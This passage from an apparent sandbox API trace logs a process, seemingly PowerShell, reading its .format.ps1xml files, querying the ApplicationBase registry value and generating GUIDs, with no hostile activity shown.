lpOverlapped=0x0) returned 1 [0049.291] ReadFile (in: hFile=0x30c, lpBuffer=0x33b0fe2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b0fe2*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.291] ReadFile (in: hFile=0x30c, lpBuffer=0x33b19b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x33b19b0*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.291] CloseHandle (hObject=0x30c) returned 1 [0049.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.291] SetErrorMode (uMode=0x1) returned 0x1 [0049.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0049.292] SetErrorMode (uMode=0x1) returned 0x1 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.292] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.292] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b1b0 [0049.292] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b1b0, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.292] CoTaskMemFree (pv=0x1b87b1b0) [0049.292] RegCloseKey (hKey=0x30c) returned 0x0 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.358] VirtualQuery (in: lpAddress=0x26bd60, lpBuffer=0x26cc20, dwLength=0x30 | out: lpBuffer=0x26cc20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0049.359] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf1709a94, Data2=0x4430, Data3=0x4498, Data4=([0]=0xab, [1]=0xce, [2]=0x7a, [3]=0x38, [4]=0x7d, [5]=0xae, [6]=0x3c, [7]=0xff))) returned 0x0 [0049.360] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xcf6244c4, Data2=0xc36c, Data3=0x4aa6, Data4=([0]=0xb7, [1]=0x2, [2]=0x69, [3]=0xab, [4]=0xa7, [5]=0xb1, [6]=0x8f, [7]=0xd6))) returned 0x0 [0049.360] VirtualQuery (in: lpAddress=0x26bf10, lpBuffer=0x26cdd0, dwLength=0x30 | out: lpBuffer=0x26cdd0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0049.361] VirtualQuery (in: lpAddress=0x26bf10, lpBuffer=0x26cdd0, dwLength=0x30 | out: lpBuffer=0x26cdd0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0049.362] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x5e86be49, Data2=0x7bf9, Data3=0x4934, Data4=([0]=0x90, [1]=0x9f, [2]=0x25, [3]=0x32, [4]=0xee, [5]=0xe, [6]=0xfe, [7]=0xc))) returned 0x0 [0049.365] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xabec8a9, Data2=0x183a, Data3=0x44ba, Data4=([0]=0xbc, [1]=0x19, [2]=0x52, [3]=0xdb, [4]=0x99, [5]=0xae, [6]=0x0, [7]=0x38))) returned 0x0 [0049.365] VirtualQuery (in: lpAddress=0x26c160, lpBuffer=0x26d020, dwLength=0x30 | out: lpBuffer=0x26d020*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0049.367] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf834f583, Data2=0x5e8b, Data3=0x4895, Data4=([0]=0x91, [1]=0x9b, [2]=0xc0, [3]=0x66, [4]=0x2c, [5]=0xa, [6]=0x59, [7]=0x9a))) returned 0x0 [0049.368] VirtualQuery (in: lpAddress=0x26b7d0, lpBuffer=0x26c690, dwLength=0x30 | out: lpBuffer=0x26c690*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0049.369] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x132764b6, Data2=0xfb4a, Data3=0x466e, Data4=([0]=0xa5, [1]=0x50, [2]=0x1d, [3]=0xcf, [4]=0xfc, [5]=0xbe, [6]=0x12, [7]=0x94))) returned 0x0 [0049.369] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x158e3ff9, Data2=0xaf70, Data3=0x423e, Data4=([0]=0xbe, [1]=0xf8, [2]=0x84, [3]=0x1b, [4]=0x71, [5]=0x3f, [6]=0x89, [7]=0x21))) returned 0x0 [0049.370] SetErrorMode (uMode=0x1) returned 0x1 [0049.372] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.373] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.373] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.375] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.375] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.376] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.376] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.376] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.376] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.377] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.377] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.378] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x1000, lpOverlapped=0x0) returned 1 [0049.378] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0xbce, lpOverlapped=0x0) returned 1 [0049.379] ReadFile (in: hFile=0x30c, lpBuffer=0x34636de, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x34636de*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.379] ReadFile (in: hFile=0x30c, lpBuffer=0x3463fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d238, lpOverlapped=0x0 | out: lpBuffer=0x3463fa8*, lpNumberOfBytesRead=0x26d238*=0x0, lpOverlapped=0x0) returned 1 [0049.379] CloseHandle (hObject=0x30c) returned 1 [0049.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.379] SetErrorMode (uMode=0x1) returned 0x1 [0049.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0049.379] SetErrorMode (uMode=0x1) returned 0x1 [0049.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.379] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.379] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.379] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.380] CoTaskMemFree (pv=0x1b87b220) [0049.380] RegCloseKey (hKey=0x30c) returned 0x0 [0049.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0049.384] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xfc2b98b4, Data2=0x9f9e, Data3=0x4a00, Data4=([0]=0xb7, [1]=0xf1, [2]=0xf7, [3]=0xaf, [4]=0x88, [5]=0x7d, [6]=0xac, [7]=0x21))) returned 0x0 [0049.384] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x7a36e70d, Data2=0xa5b5, Data3=0x4e09, Data4=([0]=0xb8, [1]=0x1b, [2]=0xac, [3]=0x74, [4]=0x58, [5]=0xda, [6]=0x5f, [7]=0xf1))) returned 0x0 [0049.385] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x91767eda, Data2=0xe2bc, Data3=0x4b39, Data4=([0]=0xb2, [1]=0xd2, [2]=0xc7, [3]=0x3f, [4]=0xe5, [5]=0x5b, [6]=0x6d, [7]=0x6b))) returned 0x0 [0049.385] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x135805b8, Data2=0xa5e1, Data3=0x4bb0, Data4=([0]=0xbd, [1]=0x82, [2]=0x90, [3]=0xb5, [4]=0x28, [5]=0x1, [6]=0x36, [7]=0x38))) returned 0x0 [0049.386] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x7d67ada0, Data2=0x5089, Data3=0x465f, Data4=([0]=0xb2, [1]=0x34, [2]=0x50, [3]=0x4e, [4]=0xaf, [5]=0x6, [6]=0x62, [7]=0xa1))) returned 0x0 [0049.386] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xeda8ff0d, Data2=0x5eb1, Data3=0x407a, Data4=([0]=0xb1, [1]=0x92, [2]=0x8c, [3]=0x3a, [4]=0x20, [5]=0xae, [6]=0x49, [7]=0x5b))) returned 0x0 [0049.387] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x199f681d, Data2=0x3b9b, Data3=0x446b, Data4=([0]=0x9f, [1]=0x33, [2]=0xf2, [3]=0xcc, [4]=0x4, [5]=0x6e, [6]=0xc9, [7]=0x26))) returned 0x0 [0049.388] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x2e4504e7, Data2=0x1e32, Data3=0x415a, Data4=([0]=0xb8, [1]=0x42, [2]=0xaa, [3]=0x9, [4]=0x6d, [5]=0x6c, [6]=0xd8, [7]=0xcb))) returned 0x0 [0049.388] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x1e174885, Data2=0x7561, Data3=0x4610, Data4=([0]=0xb1, [1]=0x5f, [2]=0x87, [3]=0x8b, [4]=0xd8, [5]=0xa9, [6]=0x8b, [7]=0x31))) returned 0x0 [0049.389] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x24d9db3b, Data2=0x5d8f, Data3=0x4d32, Data4=([0]=0xb5, [1]=0x28, [2]=0xed, [3]=0x17, [4]=0x56, [5]=0xec, [6]=0x2d, [7]=0x18))) returned 0x0 [0049.389] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xdf65fa59, Data2=0xebf3, Data3=0x4cca, Data4=([0]=0x90, [1]=0x29, [2]=0x48, [3]=0x1c, [4]=0xb5, [5]=0xd, [6]=0x56, [7]=0x26))) returned 0x0 [0049.390] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xc6c68240, Data2=0x914d, Data3=0x4933, Data4=([0]=0xa6, [1]=0x82, [2]=0x54, [3]=0x71, [4]=0x63, [5]=0xca, [6]=0x95, [7]=0x6))) returned 0x0 [0049.393] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x597e7019, Data2=0xd66b, Data3=0x404d, Data4=([0]=0xb2, [1]=0x76, [2]=0x2a, [3]=0x2b, [4]=0x14, [5]=0x70, [6]=0x1a, [7]=0x1d))) returned 0x0 [0049.393] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xc58a593a, Data2=0xcff5, Data3=0x43a0, Data4=([0]=0x86, [1]=0x38, [2]=0x81, [3]=0x30, [4]=0xd4, [5]=0x65, [6]=0x26, [7]=0xcf))) returned 0x0 [0049.394] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xaa87066b, Data2=0x6242, Data3=0x41a0, Data4=([0]=0x8d, [1]=0xaa, [2]=0xbb, [3]=0xed, [4]=0x3e, [5]=0xc4, [6]=0xbf, [7]=0x1f))) returned 0x0 [0049.394] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x74419b7a, Data2=0x67c5, Data3=0x4843, Data4=([0]=0x94, [1]=0x40, [2]=0xa8, [3]=0x4f, [4]=0xeb, [5]=0x3e, [6]=0xd2, [7]=0x15))) returned 0x0 [0049.394] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xfd169d4d, Data2=0xbca8, Data3=0x49f9, Data4=([0]=0xb4, [1]=0xe6, [2]=0x97, [3]=0xb5, [4]=0x6a, [5]=0xa0, [6]=0x2c, [7]=0xa1))) returned 0x0 [0049.395] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe9232ab0, Data2=0xca5b, Data3=0x47da, Data4=([0]=0xbe, [1]=0xd4, [2]=0x2c, [3]=0xef, [4]=0xfb, [5]=0xe3, [6]=0xc9, [7]=0xf3))) returned 0x0 [0049.396] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3b6411cd, Data2=0xba9c, Data3=0x4ca0, Data4=([0]=0xbe, [1]=0x6e, [2]=0x61, [3]=0x9f, [4]=0xd0, [5]=0x6f, [6]=0xf6, [7]=0x13))) returned 0x0 [0049.396] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x8ceecc4f, Data2=0x8092, Data3=0x4690, Data4=([0]=0xb5, [1]=0x8d, [2]=0xa9, [3]=0xa8, [4]=0xa0, [5]=0xb9, [6]=0x91, [7]=0x1b))) returned 0x0 [0049.397] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd51deedc, Data2=0xa9a2, Data3=0x4905, Data4=([0]=0xb7, [1]=0xdf, [2]=0x21, [3]=0xce, [4]=0xfb, [5]=0x8b, [6]=0x9e, [7]=0x17))) returned 0x0 [0049.397] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xcb7d0289, Data2=0xfbc0, Data3=0x46fc, Data4=([0]=0xac, [1]=0xf0, [2]=0x87, [3]=0x8f, [4]=0xf9, [5]=0x59, [6]=0x8, [7]=0x42))) returned 0x0 [0049.397] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xfdd611ac, Data2=0xe629, Data3=0x4348, Data4=([0]=0xbf, [1]=0xa0, [2]=0x40, [3]=0xbb, [4]=0xd1, [5]=0xd2, [6]=0x70, [7]=0xb9))) returned 0x0 [0049.398] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x47274288, Data2=0x279, Data3=0x490d, Data4=([0]=0x96, [1]=0xfa, [2]=0x95, [3]=0xc9, [4]=0xcb, [5]=0xff, [6]=0x7, [7]=0x49))) returned 0x0 [0049.398] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xcb715ad4, Data2=0x8fea, Data3=0x4b4a, Data4=([0]=0xac, [1]=0x90, [2]=0x7e, [3]=0xbf, [4]=0x94, [5]=0xaa, [6]=0x7a, [7]=0xbf))) returned 0x0 [0049.398] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x2a836a99, Data2=0x1913, Data3=0x4d65, Data4=([0]=0xab, [1]=0xfb, [2]=0xdf, [3]=0x66, [4]=0xfa, [5]=0xac, [6]=0x81, [7]=0x1b))) returned 0x0 [0049.399] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xbae88caf, Data2=0x15a1, Data3=0x49f1, Data4=([0]=0x8c, [1]=0x9d, [2]=0x2c, [3]=0x1f, [4]=0x43, [5]=0xe6, [6]=0xe0, [7]=0xc1))) returned 0x0 [0049.399] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x2b36d87d, Data2=0xc70c, Data3=0x42e4, Data4=([0]=0xad, [1]=0x32, [2]=0x5a, [3]=0x4c, [4]=0x3d, [5]=0x15, [6]=0xf3, [7]=0xa7))) returned 0x0 [0049.400] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x5af974d6, Data2=0xb572, Data3=0x412a, Data4=([0]=0xbf, [1]=0x9b, [2]=0xdd, [3]=0xd, [4]=0xe7, [5]=0x93, [6]=0xe0, [7]=0xbd))) returned 0x0 [0049.400] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb1f23581, Data2=0x8b14, Data3=0x49cc, Data4=([0]=0xb6, [1]=0x7c, [2]=0xad, [3]=0xd2, [4]=0x1e, [5]=0xb1, [6]=0xf, [7]=0xa4))) returned 0x0 [0049.400] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3f5457dd, Data2=0xa35, Data3=0x447d, Data4=([0]=0x97, [1]=0x64, [2]=0x89, [3]=0xf9, [4]=0x96, [5]=0x54, [6]=0x98, [7]=0xef))) returned 0x0 [0049.401] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x9072157d, Data2=0x417, Data3=0x430b, Data4=([0]=0x88, [1]=0x20, [2]=0x82, [3]=0x7e, [4]=0x74, [5]=0x3b, [6]=0x9, [7]=0xaf))) returned 0x0 [0049.401] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3aa35294, Data2=0x80b6, Data3=0x4940, Data4=([0]=0x8a, [1]=0xde, [2]=0xe2, [3]=0xc0, [4]=0x5e, [5]=0xa0, [6]=0x22, [7]=0xbf))) returned 0x0 [0049.402] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x5f423057, Data2=0x6170, Data3=0x4414, Data4=([0]=0x83, [1]=0x76, [2]=0xab, [3]=0xfe, [4]=0xf5, [5]=0xf6, [6]=0x82, [7]=0xc))) returned 0x0 [0049.402] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe3b00b0b, Data2=0x39ab, Data3=0x42d2, Data4=([0]=0x94, [1]=0xec, [2]=0x94, [3]=0xcd, [4]=0xa8, [5]=0x57, [6]=0xa, [7]=0x82))) returned 0x0 [0049.402] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x562513e7, Data2=0x2f35, Data3=0x4f48, Data4=([0]=0xba, [1]=0xf7, [2]=0x9a, [3]=0x28, [4]=0x28, [5]=0xe8, [6]=0xc7, [7]=0x3e))) returned 0x0 [0049.408] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xa567fda, Data2=0xda47, Data3=0x4e6c, Data4=([0]=0xbb, [1]=0x1b, [2]=0x11, [3]=0xa8, [4]=0x70, [5]=0x48, [6]=0x8a, [7]=0xe5))) returned 0x0 [0049.413] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.413] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.413] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.413] CoTaskMemFree (pv=0x1b87b220) [0049.413] RegCloseKey (hKey=0x30c) returned 0x0 [0049.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0049.448] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb49103fd, Data2=0x9ccf, Data3=0x4067, Data4=([0]=0xbb, [1]=0x3, [2]=0x9e, [3]=0x7c, [4]=0xef, [5]=0x6a, [6]=0xf9, [7]=0x7))) returned 0x0 [0049.448] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x650f5806, Data2=0x93d0, Data3=0x4e51, Data4=([0]=0xbd, [1]=0x61, [2]=0x59, [3]=0xce, [4]=0x3d, [5]=0x9d, [6]=0xc7, [7]=0x1b))) returned 0x0 [0049.448] CoCreateGuid (in: pguid=0x26d4f0 | out: 